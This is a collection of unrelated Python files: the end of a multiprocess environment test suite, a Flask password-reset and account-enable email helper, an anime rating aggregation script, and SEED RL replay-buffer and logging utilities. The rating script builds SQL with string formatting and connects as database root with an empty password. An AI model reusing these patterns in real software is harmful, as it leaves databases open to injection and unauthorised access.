self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testSinglethreadCommNotAlive(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='singlethread')
self._env.start()
self._env.step(0)
# set the communicator flag to 1, wait a few time steps and check that step will crash
self._env._all_comms['generic1'].crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators has been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
self._env.close()
def testMultithreadCommNotAlive(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
self._env.start()
self._env.step(0)
# set the communicator flag to 1, wait a few time steps and check that step will crash
self._env._all_comms['generic1'].crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators has been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testMultiprocessCommNotAlive(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
self._env.start()
self._env.step(0)
# set the communicator flag to 1, wait a few time steps and check that step will crash
self._env._all_comms['generic1'].crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators has been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testMultithreadPollingDead(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
self._env.start()
self._env.step(0)
self._env.crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators has been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testMultiprocessPollingDead(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
self._env.start()
self._env.step(0)
self._env.crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators has been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testSinglethreadMainProcessDead(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='singlethread')
env.start()
while True:
env.step(0)
curr_process_util = psutil.Process()
main_process = Process(target=spawn_main_process)
main_process.start()
# give some time to make sure everything running
time.sleep(1.0)
child_processes = curr_process_util.children(recursive=True)
self.assertEqual(len(child_processes), 3)
main_process.terminate()
main_process.join()
time.sleep(2.0)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultithreadMainProcessDead(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
env.start()
while True:
env.step(0)
curr_process_util = psutil.Process()
main_process = Process(target=spawn_main_process)
main_process.start()
# give some time to make sure everything running
time.sleep(1.0)
child_processes = curr_process_util.children(recursive=True)
self.assertEqual(len(child_processes), 3)
main_process.terminate()
main_process.join()
time.sleep(2.0)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultiprocessMainProcessDead(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
env.start()
while True:
env.step(0)
curr_process_util = psutil.Process()
main_process = Process(target=spawn_main_process)
main_process.start()
# give some time to make sure everything running
time.sleep(1.0)
child_processes = curr_process_util.children(recursive=True)
self.assertEqual(len(child_processes), 4)
main_process.terminate()
main_process.join()
time.sleep(2.0)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testSinglethreadMainProcessException(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='singlethread')
env.start()
env.crash_flag.value = 3
env.step(0)
main_process = Process(target=spawn_main_process)
main_process.start()
time.sleep(1.0)
main_process.join()
curr_process_util = psutil.Process()
child_processes = curr_process_util.children(recursive=True)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultithreadMainProcessException(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
env.start()
env.crash_flag.value = 3
env.step(0)
main_process = Process(target=spawn_main_process)
main_process.start()
time.sleep(1.0)
main_process.join()
curr_process_util = psutil.Process()
child_processes = curr_process_util.children(recursive=True)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultiprocessMainProcessException(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
env.start()
env.crash_flag.value = 3
env.step(0)
main_process = Process(target=spawn_main_process)
main_process.start()
time.sleep(1.0)
main_process.join()
curr_process_util = psutil.Process()
child_processes = curr_process_util.children(recursive=True)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testSharedRandomState(self):
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
initial_rand_obj = copy.deepcopy(env._rand_obj_)
initial_values = initial_rand_obj.uniform(-1, +1, 3)
env.start()
for _ in range(3):
env.step(0)
updated_rand_obj = np.random.RandomState()
updated_rand_obj.set_state(utils.get_random_state_from_array(env._shared_rstate_array_))
safe_final_values = updated_rand_obj.uniform(-1, +1, 3)
unsafe_final_values = env._rand_obj_.uniform(-1, +1, 3)
env.step(0)
env.close()
assert np.all(initial_values == unsafe_final_values)
assert np.all(initial_values != safe_final_values)
assert np.all(safe_final_values == env._uniform_array_)
if __name__ == '__main__':
unittest.main(buffer=True)
|
email.py
|
from threading import Thread
from flask import render_template
from flask_mail import Message
from app import app, mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Social Insecurity] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
def send_enable_account_email(user):
token = user.get_account_enable_token()
send_email('[Social Insecurity] Enable your account',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/enable_account.txt',
user=user, token=token),
html_body=render_template('email/enable_account.html',
user=user, token=token))
|
insert_rating.py
|
import time
import pymysql
import mysql.connector
import multiprocessing
from pymysql.cursors import DictCursor
from multiprocessing import Process, Pool
db1 = pymysql.connect("localhost", "root", "", "miraihyoka")
db2 = pymysql.connect("localhost", "root", "", "miraihyoka")
cursor_b = db1.cursor(DictCursor)
cursor_m = db2.cursor(DictCursor)
# 7个评分
# mal_rating anidb_rating ann_rating anikore_rating bangumi_rating imdb_rating douban_rating
def get_rating():
i = 1
sql2 = "select * from animate "
# args = (rating, rating)
cursor_b.execute(sql2)
items_b = cursor_b.fetchall()
for item_b in items_b:
animate_id = item_b['animate_id']
# 各个网站的权重
mal_p = 50
anidb_p = 30
ann_p = 30
anikore_p = 100
bangumi_p = 60
douban_p = 40
imdb_p = 30
mal_rating = item_b['mal_rating']
anidb_rating = item_b['anidb_rating']
ann_rating = item_b['ann_rating']
anikore_rating = item_b['anikore_rating']
bangumi_rating = item_b['bangumi_rating']
imdb_rating = item_b['imdb_rating']
douban_rating = item_b['douban_rating']
anikore_rating /= 10
if mal_rating == 0:
mal_p = 0
if anidb_rating == 0:
anidb_p = 0
if anidb_rating is None:
anidb_rating=0
if ann_rating == 0:
ann_p = 0
if anikore_rating == 0:
anikore_p = 0
if bangumi_rating == 0:
bangumi_p = 0
if imdb_rating == 0:
imdb_p = 0
if douban_rating == 0:
douban_p = 0
rating = (
mal_rating * mal_p + anidb_rating * anidb_p + ann_rating * ann_p + anikore_rating * anikore_p + bangumi_rating * bangumi_p + imdb_rating * imdb_p + douban_rating * douban_p) / (
mal_p + anidb_p + ann_p + anikore_p + bangumi_p + douban_p + imdb_p)
sql1 = "update animate set media_rating='{}' where animate_id='{}'".format(rating, animate_id)
cursor_m.execute(sql1)
db2.commit()
print("-----------------已插入" + str(i) + "条-----------------")
i += 1
if __name__ == '__main__':
get_rating()
# sql1 = "select * from animate"
# db2.ping(reconnect=True)
# cursor_m.execute(sql1)
# items_m = cursor_m.fetchall()
# nnn = 0
# aa = Pool(30)
# for item_m in items_m:
# an = item_m["animate_id"]
# bid = item_m["bangumi_idid"]
# if bid is not None:
# nnn += 1
# aa.apply_async(get_rank, args=(an, bid, nnn))
# # p = Process(target=getbangumiid, args=(an, bid, nnn))
# # p.start()
# aa.close()
# aa.join()
|
utils.py
|
# coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions/classes."""
import collections
import threading
import timeit
from absl import logging
import gym
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.python.distribute import values as values_lib
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import tensor_conversion_registry
# `observation` is the observation *after* a transition. When `done` is True,
# `observation` will be the observation *after* the reset.
EnvOutput = collections.namedtuple(
'EnvOutput', 'reward done observation abandoned episode_step')
Settings = collections.namedtuple(
'Settings', 'strategy inference_devices training_strategy encode decode')
def init_learner(num_training_tpus):
"""Performs common learner initialization."""
if tf.config.experimental.list_logical_devices('TPU'):
resolver = tf.distribute.cluster_resolver.TPUClusterResolver('')
topology = tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.experimental.TPUStrategy(resolver)
training_da = tf.tpu.experimental.DeviceAssignment.build(
topology, num_replicas=num_training_tpus)
training_strategy = tf.distribute.experimental.TPUStrategy(
resolver, device_assignment=training_da)
inference_devices = list(set(strategy.extended.worker_devices) -
set(training_strategy.extended.worker_devices))
return Settings(strategy, inference_devices, training_strategy, tpu_encode,
tpu_decode)
else:
tf.device('/cpu').__enter__()
any_gpu = tf.config.experimental.list_logical_devices('GPU')
device_name = '/device:GPU:0' if any_gpu else '/device:CPU:0'
strategy = tf.distribute.OneDeviceStrategy(device=device_name)
enc = lambda x: x
dec = lambda x, s=None: x if s is None else tf.nest.pack_sequence_as(s, x)
return Settings(strategy, [device_name], strategy, enc, dec)
class UnrollStore(tf.Module):
"""Utility module for combining individual actor steps into unrolls."""
def __init__(self,
num_actors,
unroll_length,
timestep_specs,
num_overlapping_steps=0,
name='UnrollStore'):
super(UnrollStore, self).__init__(name=name)
with self.name_scope:
self._full_length = num_overlapping_steps + unroll_length + 1
def create_unroll_variable(spec):
z = tf.zeros(
[num_actors, self._full_length] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._unroll_length = unroll_length
self._num_overlapping_steps = num_overlapping_steps
self._state = tf.nest.map_structure(create_unroll_variable,
timestep_specs)
# For each actor, the index into the actor dimension of the tensors in
# self._state where we should add the next element.
self._index = tf.Variable(
tf.fill([num_actors], tf.constant(num_overlapping_steps, tf.int32)),
trainable=False,
name='index')
@property
def unroll_specs(self):
return tf.nest.map_structure(lambda v: tf.TensorSpec(v.shape[1:], v.dtype),
self._state)
@tf.function
@tf.Module.with_name_scope
def append(self, actor_ids, values):
"""Appends values and returns completed unrolls.
Args:
actor_ids: 1D tensor with the list of actor IDs for which we append data.
There must not be duplicates.
values: Values to add for each actor. This is a structure (in the tf.nest
sense) of tensors following "timestep_specs", with a batch front
dimension which must be equal to the length of 'actor_ids'.
Returns:
A pair of:
- 1D tensor of the actor IDs of the completed unrolls.
- Completed unrolls. This is a structure of tensors following
'timestep_specs', with added front dimensions: [num_completed_unrolls,
num_overlapping_steps + unroll_length + 1].
"""
tf.debugging.assert_equal(
tf.shape(actor_ids),
tf.shape(tf.unique(actor_ids)[0]),
message='Duplicate actor ids')
tf.nest.map_structure(
lambda s: tf.debugging.assert_equal(
tf.shape(actor_ids)[0],
tf.shape(s)[0],
message='Batch dimension must be same size as number of actors.'),
values)
curr_indices = self._index.sparse_read(actor_ids)
unroll_indices = tf.stack([actor_ids, curr_indices], axis=-1)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_nd_update(unroll_indices, v)
# Intentionally not protecting against out-of-bounds to make it possible to
# detect completed unrolls.
self._index.scatter_add(tf.IndexedSlices(1, actor_ids))
return self._complete_unrolls(actor_ids)
@tf.function
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Resets state.
Note, this is only intended to be called when actors need to be reset after
preemptions. Not at episode boundaries.
Args:
actor_ids: The actors that need to have their state reset.
"""
self._index.scatter_update(
tf.IndexedSlices(self._num_overlapping_steps, actor_ids))
# The following code is the equivalent of:
# s[actor_ids, :j] = 0
j = self._num_overlapping_steps
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(tf.cast(actor_ids, tf.int64), -1), [1, j]), [-1])
repeated_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
indices = tf.stack([repeated_actor_ids, repeated_range], axis=-1)
for s in tf.nest.flatten(self._state):
z = tf.zeros(tf.concat([tf.shape(repeated_actor_ids),
s.shape[2:]], axis=0), s.dtype)
s.scatter_nd_update(indices, z)
def _complete_unrolls(self, actor_ids):
# Actor with unrolls that are now complete and should be returned.
actor_indices = self._index.sparse_read(actor_ids)
actor_ids = tf.gather(
actor_ids,
tf.where(tf.equal(actor_indices, self._full_length))[:, 0])
actor_ids = tf.cast(actor_ids, tf.int64)
unrolls = tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
# Store last transitions as the first in the next unroll.
# The following code is the equivalent of:
# s[actor_ids, :j] = s[actor_ids, -j:]
j = self._num_overlapping_steps + 1
repeated_start_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_end_range = tf.tile(
tf.range(self._full_length - j, self._full_length, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(actor_ids, -1), [1, j]), [-1])
start_indices = tf.stack([repeated_actor_ids, repeated_start_range], -1)
end_indices = tf.stack([repeated_actor_ids, repeated_end_range], -1)
for s in tf.nest.flatten(self._state):
s.scatter_nd_update(start_indices, s.gather_nd(end_indices))
self._index.scatter_update(
tf.IndexedSlices(1 + self._num_overlapping_steps, actor_ids))
return actor_ids, unrolls
class PrioritizedReplay(tf.Module):
"""Prioritized Replay Buffer.
This buffer is not threadsafe. Make sure you call insert() and sample() from a
single thread.
"""
def __init__(self, size, specs, importance_sampling_exponent,
name='PrioritizedReplay'):
super(PrioritizedReplay, self).__init__(name=name)
self._priorities = tf.Variable(tf.zeros([size]), dtype=tf.float32)
self._buffer = tf.nest.map_structure(
lambda ts: tf.Variable(tf.zeros([size] + ts.shape, dtype=ts.dtype)),
specs)
self.num_inserted = tf.Variable(0, dtype=tf.int64)
self._importance_sampling_exponent = importance_sampling_exponent
@tf.function
@tf.Module.with_name_scope
def insert(self, values, priorities):
"""FIFO insertion/removal.
Args:
values: The batched values to insert. The tensors must be of the same
shape and dtype as the `specs` provided in the constructor, except
including a batch dimension.
priorities: <float32>[batch_size] tensor with the priorities of the
elements we insert.
Returns:
The indices of the inserted values.
"""
tf.nest.assert_same_structure(values, self._buffer)
values = tf.nest.map_structure(tf.convert_to_tensor, values)
append_size = tf.nest.flatten(values)[0].shape[0]
start_index = self.num_inserted
end_index = start_index + append_size
# Wrap around insertion.
size = self._priorities.shape[0]
insert_indices = tf.range(start_index, end_index) % size
tf.nest.map_structure(
lambda b, v: b.batch_scatter_update(
tf.IndexedSlices(v, insert_indices)),
self._buffer,
values)
self.num_inserted.assign_add(append_size)
self._priorities.batch_scatter_update(
tf.IndexedSlices(priorities, insert_indices))
return insert_indices
@tf.function
@tf.Module.with_name_scope
def sample(self, num_samples, priority_exp):
r"""Samples items from the replay buffer, using priorities.
Args:
num_samples: int, number of replay items to sample.
priority_exp: Priority exponent. Every item i in the replay buffer will be
sampled with probability:
priority[i] ** priority_exp /
sum(priority[j] ** priority_exp, j \in [0, num_items))
Set this to 0 in order to get uniform sampling.
Returns:
Tuple of:
- indices: An int64 tensor of shape [num_samples] with the indices in
the replay buffer of the sampled items.
- weights: A float32 tensor of shape [num_samples] with the normalized
weights of the sampled items.
- sampled_values: A nested structure following the spec passed in the
contructor, where each tensor has an added front batch dimension equal
to 'num_samples'.
"""
tf.debugging.assert_greater_equal(
self.num_inserted,
tf.constant(0, tf.int64),
message='Cannot sample if replay buffer is empty')
size = self._priorities.shape[0]
limit = tf.minimum(tf.cast(size, tf.int64), self.num_inserted)
if priority_exp == 0:
indices = tf.random.uniform([num_samples], maxval=limit, dtype=tf.int64)
weights = tf.ones_like(indices, dtype=tf.float32)
else:
prob = self._priorities[:limit]**priority_exp
prob /= tf.reduce_sum(prob)
indices = tf.random.categorical([tf.math.log(prob)], num_samples)[0]
# Importance weights.
weights = (((1. / tf.cast(limit, tf.float32)) /
tf.gather(prob, indices)) **
self._importance_sampling_exponent)
weights /= tf.reduce_max(weights) # Normalize.
sampled_values = tf.nest.map_structure(
lambda b: b.sparse_read(indices), self._buffer)
return indices, weights, sampled_values
@tf.function
@tf.Module.with_name_scope
def update_priorities(self, indices, priorities):
"""Updates the priorities of the items with the given indices.
Args:
indices: <int64>[batch_size] tensor with the indices of the items to
update. If duplicate indices are provided, the priority that will be set
among possible ones is not specified.
priorities: <float32>[batch_size] tensor with the new priorities.
"""
self._priorities.batch_scatter_update(tf.IndexedSlices(priorities, indices))
class HindsightExperienceReplay(PrioritizedReplay):
"""Replay Buffer with Hindsight Experience Replay.
Hindsight goals are sampled uniformly from subsequent steps in the
same window (`future` strategy from https://arxiv.org/pdf/1707.01495).
They are not guaranteed to come from the same episode.
This buffer is not threadsafe. Make sure you call insert() and sample() from a
single thread.
"""
def __init__(self, size, specs, importance_sampling_exponent,
compute_reward_fn,
unroll_length,
substitution_probability,
name='HindsightExperienceReplay'):
super(HindsightExperienceReplay, self).__init__(
size, specs, importance_sampling_exponent, name)
self._compute_reward_fn = compute_reward_fn
self._unroll_length = unroll_length
self._substitution_probability = substitution_probability
@tf.Module.with_name_scope
def sample(self, num_samples, priority_exp):
indices, weights, sampled_values = super(
HindsightExperienceReplay, self).sample(num_samples, priority_exp)
observation = sampled_values.env_outputs.observation
batch_size, time_horizon = observation['achieved_goal'].shape[:2]
def compute_goal_reward():
# reward[batch][time] is the reward on transition from timestep time-1
# to time. This function outputs incorrect rewards for the last transition
# in each episode but we filter such cases later.
goal_reward = self._compute_reward_fn(
achieved_goal=observation['achieved_goal'][:, 1:],
desired_goal=observation['desired_goal'][:, :-1])
return tf.concat(values=[goal_reward[:, :1] * np.nan, goal_reward],
axis=1)
# Substitute goals.
old_goal_reward = compute_goal_reward()
assert old_goal_reward.shape == observation['achieved_goal'].shape[:-1]
goal_ind = tf.concat(
values=[tf.random.uniform((batch_size, 1), min(t + 1, time_horizon - 1),
time_horizon, dtype=tf.int32)
for t in range(time_horizon)], axis=1)
substituted_goal = tf.gather(observation['achieved_goal'],
goal_ind, axis=1, batch_dims=1)
mask = tf.cast(tfp.distributions.Bernoulli(
probs=self._substitution_probability *
tf.ones(goal_ind.shape)).sample(), observation['desired_goal'].dtype)
# We don't substitute goals for the last states in each episodes because we
# don't store the next states for them.
mask *= tf.cast(~sampled_values.env_outputs.done,
observation['desired_goal'].dtype)
mask = mask[..., tf.newaxis]
observation['desired_goal'] = (
mask * substituted_goal + (1 - mask) * observation['desired_goal'])
# Substitude reward
new_goal_reward = compute_goal_reward()
assert new_goal_reward.shape == observation['achieved_goal'].shape[:-1]
sampled_values = sampled_values._replace(
env_outputs=sampled_values.env_outputs._replace(
reward=sampled_values.env_outputs.reward +
(new_goal_reward - old_goal_reward) * tf.cast(
~sampled_values.env_outputs.done, tf.float32)
))
# Subsample unrolls of length unroll_length + 1.
assert time_horizon >= self._unroll_length + 1
unroll_begin_ind = tf.random.uniform(
(batch_size,), 0, time_horizon - self._unroll_length, dtype=tf.int32)
unroll_inds = unroll_begin_ind[:, tf.newaxis] + tf.math.cumsum(
tf.ones((batch_size, self._unroll_length + 1), tf.int32),
axis=1, exclusive=True)
subsampled_values = tf.nest.map_structure(
lambda t: tf.gather(t, unroll_inds, axis=1, batch_dims=1),
sampled_values)
if hasattr(sampled_values, 'agent_state'): # do not subsample the state
subsampled_values = subsampled_values._replace(
agent_state=sampled_values.agent_state)
return indices, weights, subsampled_values
class Aggregator(tf.Module):
"""Utility module for keeping state and statistics for individual actors."""
def __init__(self, num_actors, specs, name='Aggregator'):
"""Inits an Aggregator.
Args:
num_actors: int, number of actors.
specs: Structure (as defined by tf.nest) of tf.TensorSpecs that will be
stored for each actor.
name: Name of the scope for the operations.
"""
super(Aggregator, self).__init__(name=name)
def create_variable(spec):
z = tf.zeros([num_actors] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._state = tf.nest.map_structure(create_variable, specs)
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Fills the tensors for the given actors with zeros."""
with tf.name_scope('Aggregator_reset'):
for s in tf.nest.flatten(self._state):
s.scatter_update(tf.IndexedSlices(0, actor_ids))
@tf.Module.with_name_scope
def add(self, actor_ids, values):
"""In-place adds values to the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to add values to.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_add(tf.IndexedSlices(v, actor_ids))
@tf.Module.with_name_scope
def read(self, actor_ids):
"""Reads the values corresponding to a list of actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to read.
Returns:
A structure of tensors with the same shapes as the input specs. A
dimension is added in front of each tensor, with size equal to the number
of actor_ids provided.
"""
return tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
@tf.Module.with_name_scope
def replace(self, actor_ids, values):
"""Replaces the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_update(tf.IndexedSlices(v, actor_ids))
class ProgressLogger(object):
"""Helper class for performing periodic logging of the training progress."""
def __init__(self,
summary_writer=None,
initial_period=0.01,
period_factor=1.01,
max_period=10.0):
"""Constructs ProgressLogger.
Args:
summary_writer: Tensorflow summary writer to use.
initial_period: Initial logging period in seconds
(how often logging happens).
period_factor: Factor by which logging period is
multiplied after each iteration (exponential back-off).
max_period: Maximal logging period in seconds
(the end of exponential back-off).
"""
self.summary_writer = summary_writer
self.period = initial_period
self.period_factor = period_factor
self.max_period = max_period
# Array of strings with names of values to be logged.
self.log_keys = []
self.log_keys_set = set()
self.step_cnt = tf.Variable(-1, dtype=tf.int64)
self.ready_values = tf.Variable([-1.0],
dtype=tf.float32,
shape=tf.TensorShape(None))
self.logger_thread = None
self.logging_callback = None
self.terminator = None
self.last_log_time = timeit.default_timer()
self.last_log_step = 0
def start(self, logging_callback=None):
assert self.logger_thread is None
self.logging_callback = logging_callback
self.terminator = threading.Event()
self.logger_thread = threading.Thread(target=self._logging_loop)
self.logger_thread.start()
def shutdown(self):
assert self.logger_thread
self.terminator.set()
self.logger_thread.join()
self.logger_thread = None
def log_session(self):
return []
def log(self, session, name, value):
# this is a python op so it happens only when this tf.function is compiled
if name not in self.log_keys_set:
self.log_keys.append(name)
self.log_keys_set.add(name)
# this is a TF op.
session.append(value)
def log_session_from_dict(self, dic):
session = self.log_session()
for key in dic:
self.log(session, key, dic[key])
return session
def step_end(self, session, strategy=None, step_increment=1):
logs = []
for value in session:
if strategy:
value = tf.reduce_mean(tf.cast(
strategy.experimental_local_results(value)[0], tf.float32))
logs.append(value)
self.ready_values.assign(logs)
self.step_cnt.assign_add(step_increment)
def _log(self):
"""Perform single round of logging."""
logging_time = timeit.default_timer()
step_cnt = self.step_cnt.read_value()
values = self.ready_values.read_value().numpy()
if values[0] == -1:
return
assert len(values) == len(
self.log_keys
), 'Mismatch between number of keys and values to log: %r vs %r' % (
values, self.log_keys)
if self.summary_writer:
self.summary_writer.set_as_default()
tf.summary.experimental.set_step(step_cnt.numpy())
if self.logging_callback:
self.logging_callback()
for key, value in zip(self.log_keys, values):
tf.summary.scalar(key, value)
dt = logging_time - self.last_log_time
df = tf.cast(step_cnt - self.last_log_step, tf.float32)
tf.summary.scalar('speed/steps_per_sec', df / dt)
self.last_log_time, self.last_log_step = logging_time, step_cnt
def _logging_loop(self):
last_log_try = timeit.default_timer()
while not self.terminator.isSet():
self._log()
now = timeit.default_timer()
elapsed = now - last_log_try
last_log_try = now
self.period = min(self.period_factor * self.period,
self.max_period)
self.terminator.wait(timeout=max(0, self.period - elapsed))
class StructuredFIFOQueue(tf.queue.FIFOQueue):
"""A tf.queue.FIFOQueue that supports nests and tf.TensorSpec."""
def __init__(self,
capacity,
specs,
shared_name=None,
name='structured_fifo_queue'):
self._specs = specs
self._flattened_specs = tf.nest.flatten(specs)
dtypes = [ts.dtype for ts in self._flattened_specs]
shapes = [ts.shape for ts in self._flattened_specs]
super(StructuredFIFOQueue, self).__init__(capacity, dtypes, shapes)
def dequeue(self, name=None):
result = super(StructuredFIFOQueue, self).dequeue(name=name)
return tf.nest.pack_sequence_as(self._specs, result)
def dequeue_many(self, batch_size, name=None):
result = super(StructuredFIFOQueue, self).dequeue_many(
batch_size, name=name)
return tf.nest.pack_sequence_as(self._specs, result)
def enqueue(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue(
tf.nest.flatten(vals), name=name)
def enqueue_many(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue_many(
tf.nest.flatten(vals), name=name)
def batch_apply(fn, inputs):
"""Folds time into the batch dimension, runs fn() and unfolds the result.
Args:
fn: Function that takes as input the n tensors of the tf.nest structure,
with shape [time*batch, <remaining shape>], and returns a tf.nest
structure of batched tensors.
inputs: tf.nest structure of n [time, batch, <remaining shape>] tensors.
Returns:
tf.nest structure of [time, batch, <fn output shape>]. Structure is
determined by the output of fn.
"""
time_to_batch_fn = lambda t: tf.reshape(t, [-1] + t.shape[2:].as_list())
batched = tf.nest.map_structure(time_to_batch_fn, inputs)
output = fn(*batched)
prefix = [int(tf.nest.flatten(inputs)[0].shape[0]), -1]
batch_to_time_fn = lambda t: tf.reshape(t, prefix + t.shape[1:].as_list())
return tf.nest.map_structure(batch_to_time_fn, output)
def make_time_major(x):
"""Transposes the batch and time dimensions of a nest of Tensors.
If an input tensor has rank < 2 it returns the original tensor. Retains as
much of the static shape information as possible.
Args:
x: A nest of Tensors.
Returns:
x transposed along the first two dimensions.
"""
def transpose(t):
t_static_shape = t.shape
if t_static_shape.rank is not None and t_static_shape.rank < 2:
return t
t_rank = tf.rank(t)
t_t = tf.transpose(t, tf.concat(([1, 0], tf.range(2, t_rank)), axis=0))
t_t.set_shape(
tf.TensorShape([t_static_shape[1],
t_static_shape[0]]).concatenate(t_static_shape[2:]))
return t_t
return tf.nest.map_structure(
lambda t: tf.xla.experimental.compile(transpose, [t])[0], x)
class TPUEncodedUInt8Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedUInt8."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.uint32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedUInt8(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedUInt8
class TPUEncodedUInt8(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedUInt8Spec(encoded.shape, tf.TensorShape(shape))
@property
def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedUInt8, lambda value, *unused_args, **unused_kwargs: value.encoded)
class TPUEncodedF32Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedF32Spec."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.float32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedF32(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedF32
class TPUEncodedF32(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedF32Spec(encoded.shape, tf.TensorShape(shape))
@property
